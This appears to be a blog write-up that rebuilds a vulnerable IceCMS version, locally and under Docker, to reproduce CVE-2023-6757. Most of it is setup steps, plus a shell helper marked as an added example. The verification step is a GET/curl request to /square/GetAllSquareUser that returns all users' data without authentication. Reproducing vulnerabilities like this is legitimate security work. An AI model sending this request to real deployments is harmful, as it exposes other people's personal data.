For1moc

A sign-in-challenge type of CTFer

CVE-2023-6757 Reproduction Verification + Docker Environment Setup

The CVE-2023-6757 advisory was published on December 13, 2023.

The last commit before that date is 68f3ed1.

Check out that commit and confirm that the unauthenticated-access vulnerability (a missing authorization check) is present.

Environment Configuration

Database

create database icecmspro;
use icecmspro;
source icecms5.6.sql

Front-end (IceWk-vues)

npm install
npm run dev

Back-end

Configure the database connection in application.yml.

Resolve the dependencies declared in pom.xml.

Verifying the Unauthenticated Access

The endpoint can be requested directly, without an Authorization header:

GET http://localhost:8181/square/GetAllSquareUser

It returns the data of all users, which should be visible only to administrators.

Docker Environment Setup

The latest version ships a directory for running IceCMS under Docker: IceCMS-Docker.

Replace IceCMS-Docker/icecms-sql/IceCMS.sql with the vulnerable version's 8.0.sql file.

This version's .sql file contains no "create database" or "use" statements, so add the following at the start of the file:

CREATE DATABASE IF NOT EXISTS icecms CHARACTER SET utf8mb4;
USE icecms;

IceCMS-Docker/icecms-sql/setup.sh has Windows (CRLF) line endings, which break it on Linux. Strip them:

sed -i 's/\r$//' setup.sh

IceCMS-Docker/icecms-api/ contains no main.jar. Compile the backend (the vulnerable version) and place the resulting main.jar in that directory.
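The three preparation steps above (swapping in the old dump and giving it its CREATE DATABASE/USE header, normalising the line endings of setup.sh, and making sure main.jar is in place) are easy to get half-done by hand. The function below, added here as an example and not part of the original post or of IceCMS, performs them idempotently against an IceCMS-Docker checkout and fails with a clear message instead of letting the problem surface later as an opaque container error. The function name and argument order are my own; the file paths are the ones named in the post.

```shell
#!/usr/bin/env sh
# prepare_icecms_docker <IceCMS-Docker dir> <vulnerable 8.0.sql>
# Added example helper (not from the original post or from IceCMS).
# Prepares the IceCMS-Docker build context for the vulnerable build:
#   - installs the old dump as icecms-sql/IceCMS.sql with a CREATE DATABASE/USE header
#   - strips CRLF line endings from the dump and from icecms-sql/setup.sh
#   - refuses to report success while icecms-api/main.jar is missing
# Safe to re-run: the header is only prepended if it is not already there.
prepare_icecms_docker() {
    dir="$1"
    vuln_sql="$2"
    sql_dst="$dir/icecms-sql/IceCMS.sql"
    setup_sh="$dir/icecms-sql/setup.sh"
    jar="$dir/icecms-api/main.jar"

    [ -f "$vuln_sql" ] || { echo "missing SQL dump: $vuln_sql" >&2; return 1; }
    [ -f "$setup_sh" ] || { echo "missing $setup_sh" >&2; return 1; }

    # 1. Replace the shipped dump with the vulnerable version's dump, dropping
    #    any trailing \r so the mysql client never sees a CRLF line ending.
    sed 's/\r$//' "$vuln_sql" > "$sql_dst"

    # 2. The old dump has no CREATE DATABASE / USE statements; prepend them,
    #    but only once, so repeated runs do not stack duplicate headers.
    if ! grep -qi '^CREATE DATABASE' "$sql_dst"; then
        tmp="$sql_dst.tmp"
        {
            printf 'CREATE DATABASE IF NOT EXISTS icecms CHARACTER SET utf8mb4;\n'
            printf 'USE icecms;\n'
            cat "$sql_dst"
        } > "$tmp" && mv "$tmp" "$sql_dst"
    fi

    # 3. setup.sh also carries Windows line endings; normalise it in place
    #    (same sed invocation the post uses).
    sed -i 's/\r$//' "$setup_sh"

    # 4. The API image is built around the compiled backend; do not report the
    #    context as ready until main.jar has been dropped in.
    if [ ! -f "$jar" ]; then
        echo "main.jar not found at $jar; build the vulnerable backend first" >&2
        return 2
    fi

    echo "IceCMS-Docker prepared in $dir"
}
```

Run it as `prepare_icecms_docker ./IceCMS-Docker /path/to/8.0.sql` from the checkout's parent directory before `docker-compose up --build`. A return code of 2 means the SQL and script fixes were applied but the compiled backend is still missing.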

docker-compose.yml has two problems:

  1. The services are not attached to a shared Docker network.

  2. The host port mapping for icecms-sql is random. Change it to a fixed port, 33060.

The modified docker-compose.yml is as follows:

version: '3.9'
services:
  # Database
  icecms-sql:
    build:
      context: ./icecms-sql
    container_name: icecms-sql
    image: icecms-sql
    restart: always
    ports:
      - "33060:3306"
    networks:
      - icecms-network

  # Backend service
  icecms-api:
    build:
      context: ./icecms-api
    container_name: icecms-api
    image: icecms-api
    restart: always
    ports:
      - "8181:8181"
    networks:
      - icecms-network

  # Front-end UI
  icecms-vue:
    build:
      context: ./icecms-vue
    container_name: icecms-vue
    image: icecms-vue
    restart: always
    ports:
      - "3000:80"
    networks:
      - icecms-network

networks:
  icecms-network:
    driver: bridge

Before packaging main.jar, modify the database configuration in application.yml:

spring:
  datasource:
    url: jdbc:mysql://icecms-sql:3306/icecms?useUnicode=true&useJDBCCompliantTimezoneShift=true&serverTimezone=UTC
    username: root
    password: 123456789
    driver-class-name: com.mysql.cj.jdbc.Driver

In the IceCMS-Docker directory, run:

docker-compose up --build

Vulnerability Verification in the Docker Environment

curl http://127.0.0.1:8181/square/GetAllSquareUser

References:

https://xz.aliyun.com/t/14366

https://nvd.nist.gov/vuln/detail/CVE-2023-6757
